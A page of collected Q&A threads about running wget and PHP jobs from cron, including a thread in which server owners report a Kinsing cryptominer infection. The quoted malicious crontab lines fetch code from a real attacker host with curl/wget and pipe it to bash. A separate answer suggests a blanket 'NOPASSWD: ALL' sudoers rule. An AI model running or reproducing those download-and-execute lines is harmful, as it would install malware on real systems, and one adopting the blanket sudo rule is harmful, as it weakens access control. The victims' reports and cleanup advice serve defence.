I have a server installed with apache2 and drupal 6. In my server, I have installed a module which need to use cron. I have a SSL certificate installed too.
In my crontab y have this configuration:
* * * * * wget -O --q -t 1 http://domain:8280/folder/cron.php
* * * * * wget --no-check-certificate -O --q -t 1 https://domain/folder/cron.php
My server work but if I write this configuration in my sites-enabled/000-default:
redirect permanent / https://domain/
my module with cron stops working. This is my error in syslog:
grandchild #20349 failed with status 5
I need to redirect my traffic from http to https.
First, make sure your redirect directive in 000-default.conf is correct (see Apache wiki for details) and doesn't interfere with configuration in .htaccess file, if there is any.
Then fix you crontab this way:
Remove the first line, as you don't need plain http anymore
Change the second line for this:
wget --no-check-certificate -O /dev/null --quiet -t 1 https://domain/folder/cron.php
wget's option -O requires a path to a file, so either specify it, or just redirect to /dev/null. Also, in some versions of wget option -q considered ambiguous, so it's better to use --quiet to supress output instead.
Sometimes you may want to put your rather longish command into a shell script file, make it executable (chmod +x your-script.sh) and make sure it does exactly what you want it to do when run under the webserver's user (sudo -u www-data /path/to/your-script.sh and check if it did the trick to your drupal module). Then use the path to your script in the crontab. That will ensure that everything works like a charm and will keep your crontab neat and valid.
Related
I found that in the company server there is a crontab that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird, none of our engineers added this on the crontab, which makes me think that it could be an attack.
Any thoughts?
If your server is hosting a web application built using Laravel framework and if your debug mode is turned on, you are probably suffering from a recent RCE (Remote Code Execution) exploit.
Blogpost about technical details of the bug: https://www.ambionics.io/blog/laravel-debug-rce
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
My professional recommendation: Never run your application with debug mode open on production.
The kinsing malware is the responsible for this attack, this takes control over the crontab to maintain infected the server, I had experience with this attack and for me the only way to clean the server is to backup all the important data and reinstall from cero, I followed all the recipes and nothing work to stop it, the most important with this attack is to change the permission on the cron tab file avoiding the malware to overwrite it.
Another important thing is to see the permissions of the .ssh on the infected user, because this prevents to login using the ssh keys, you must restore the permissions to the original state to grant access again.
Search for the kdevtmpfsi executable that is somewhere in the /var/tmp, delete it and create a dummy file with the same name with all the permissions to 000, this action is not the cure but serve to gain time to backup.
I think that it is related to the issue on the link below. I saw similar entries appear on the result of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
We had same attack sat Feb 13, I changed the permisions to the crontab directory only rwx to root. Before we killed all the process of www-data with "killall -u www-data -9 " so far no other instance of the offending process... will keep monitoring. Also we disabled curl because we don't needed it.
I'm having same problem. Debian 10 server.
I checked with htop and found these:
curl -kL http://repo1.criticalnumeric.tech/scripts/cnc/install?time=1613422342
and
bash /tmp/.ssh-www-data/kswapd4
Both under www-data user. Those processes were using whole resources (CPU and memory).
Found something strange in www-data cron
root#***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
#reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
https://pastebin.com/Q049ZZtW
I think I have to reinstall Debian 10 on my server... Or how to clean it?
I installed Debian 9 on my VPS. I installed LAMP on the server. I'm logged in as root, I created a new site "/var/www/example.com" and I see that the permissions are "root:root". The web page is displayed in the browser.
I created a cron.php file that writes the current time to the file. In crontab I have /usr/bin/php /var/www/example.com/cron.php. If I run this command through the terminal, everything works. However, Crontab returns an error because it does not have write permissions. However, Crontab runs as root. The directory has 777 permissions.
I tried to set /var/www as www-data:www-data and the same for crontab (crontab -u www-data -e). The result is the same, cron runs but does not write to the file.
EDIT:
I found that if the script contains: file_put_contents('output.txt', 'xxx'); the file created by cron is in root. If I set the full path, everything is fine: file_put_contents('/var/www/exmaple.com/output.txt', 'xxx'); Is there any way to modify this behavior?
You can create sample script like this:
#!/bin/bash
source ~/.bashrc #or use .bash_profile
/usr/bin/php /var/www/example.com/cron.php >>/path/to/output
and add it as cron record:
0 * * * * /path/to/script/sh
To make things clear first: I'm using a virtual machine which is offline - security is therefor no showstopper for my need.
I have a simple bash script which performs which uses wmctrl to gracefully closes a process. KILL is not an option:
* * * * * sudo wmctrl -xc notepadqq-bin.Notepadqq
* * * * * /bin/echo "works" >> /home/usr/cron.log
I tried sudo crontab -e as well as crontab -e, the cron.log is written every minute, however the wmctrl command is not working.
I even tried to echo "password" | sudo -S rm somefile but this doesnt work for me either.
TIA!
First I'm going to make some assumptions (please correct me if these are wrong and I'll try to adapt the answer for you)
Assumptions:
you want to use cron and not any old job manager (I think this is safe from your question)
you are already familiar with cron and would like the cronjobs to actually run as often as possible (this seems odd to me but may not be central to the question at hand) ( Edit:
I also agree with that other guy's recommendation to look at https://stackoverflow.com/tags/cron/info as it provides more in depth discussion on the use of cron )
you want to use sudo for root privileges and not have the cron daemon run as root (which is normal on most systems)
you are not satisfied with chown 0:0 $(which wmctrl) the effect of chmod 4755 $(which wmctrl) or more restrictive chmod 4755 $(which wmctrl)
the results of a cron tab line "* * * * * sudo wmctrl -d >> /home/usr/cron.log" shows this "notepadqq-bin.Notepadqq" is still active from cron's perspective (IF THIS IS NOT THE CASE check the environment variables for wmctrl are preserved from cron't perspective. and let me know this assumption was wrong)
your comment "even tried to echo "password" | sudo -S rm somefile but this doesn't work for me either." implies you have a password for using sudo
You mean your comment "security is therefor no showstopper for my need"
Ensure Sudoers allows the script call
Given those assumptions, I'd recommend first looking into how sudo is setup:
Try this:
(DO NOT EDIT THIS FILE WITHOUT THE visudo command you can corrupt your system)
export EDITOR=vi ; sudo visudo -f /etc/sudoers
you will want a line similar to this:
%sudo ALL=(ALL) NOPASSWD: ALL
OR
cron ALL=(ALL) NOPASSWD: ALL
given that you can be sure the issue is not a password prompt issue with sudo and that the command (infact ALL commands run via sudo) are run as root by default (when not using -u to set to another user)
Hope this helps
So I'm trying to run a wget command using crontab every 5 minutes. My problem that I have is it's just not running. I did crontab -l to see what was running, the command is there.
the command is: wget --output-document="/Users/proudowner/Desktop/tfgo/bp.json" http://backpack.tf/api/IGetMarketPrices/v1/?key=<key>
And the error log says: /bin/sh: wget: command not found
The command also runs fine without crontab.
In crontab -e, make this your first line:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Then wget should work without specifying the full path.
You can also just specify the full path to wget (which wget to find it):
/usr/bin/wget --output-document="/Users/proudowner/Desktop/tfgo/bp.json" http://backpack.tf/api/IGetMarketPrices/v1/?key=55085a94ba8d88d1538b4576
I have a shell access on a Linux box where my Website resides.
I want to call a URL each hour on that Website (it's not a specific PHP file, I have codeigniter has a framework and some Apache redirects, so I really need to call a URL).
I guess I can use wget and crontab? How?
Add this to /etc/crontab
0 * * * * wget -O - -q -t 1 http://www.example.com/cron.php
Alternatively, create a shell script in the /etc/cron.hourly
File: wget
#!/bin/sh
wget -O - -q -t 1 http://www.example.com/cron.php
make sure you chmod +x wget (or whatever filename you picked)